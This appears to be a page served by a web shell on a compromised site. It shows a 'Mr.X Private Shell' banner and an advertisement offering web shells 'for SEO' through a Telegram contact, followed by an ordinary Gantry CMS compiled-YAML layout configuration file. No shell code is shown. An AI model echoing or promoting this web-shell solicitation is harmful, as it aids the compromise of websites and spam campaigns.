__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
return [
'@class' => 'Gantry\\Component\\File\\CompiledYamlFile',
'filename' => 'gantry-admin://blueprints/layout/section.yaml',
'modified' => 1729170693,
'data' => [
'name' => 'Section',
'description' => 'Layout section.',
'type' => 'section',
'form' => [
'fields' => [
'boxed' => [
'type' => 'select.selectize',
'label' => 'Layout',
'description' => 'Select the Layout container behavior. \'Inherit\' refers to Page Settings.',
'isset' => true,
'selectize' => [
'allowEmptyOption' => true
],
'options' => [
'' => 'Inherit from Page Settings',
0 => 'Fullwidth (Boxed Content)',
2 => 'Fullwidth (Flushed Content)',
1 => 'Boxed',
3 => 'Remove Container'
]
],
'class' => [
'type' => 'input.selectize',
'label' => 'CSS Classes',
'description' => 'Enter CSS class names.',
'default' => NULL
],
'variations' => [
'type' => 'input.section-variations',
'label' => 'Variations',
'description' => 'Enter Section Variations.',
'default' => NULL
],
'extra' => [
'type' => 'collection.keyvalue',
'label' => 'Tag Attributes',
'description' => 'Extra Tag attributes.',
'key_placeholder' => 'Key (data-*, style, ...)',
'value_placeholder' => 'Value',
'exclude' => [
0 => 'id',
1 => 'class'
]
],
'_inherit' => [
'type' => 'gantry.inherit'
]
]
]
]
];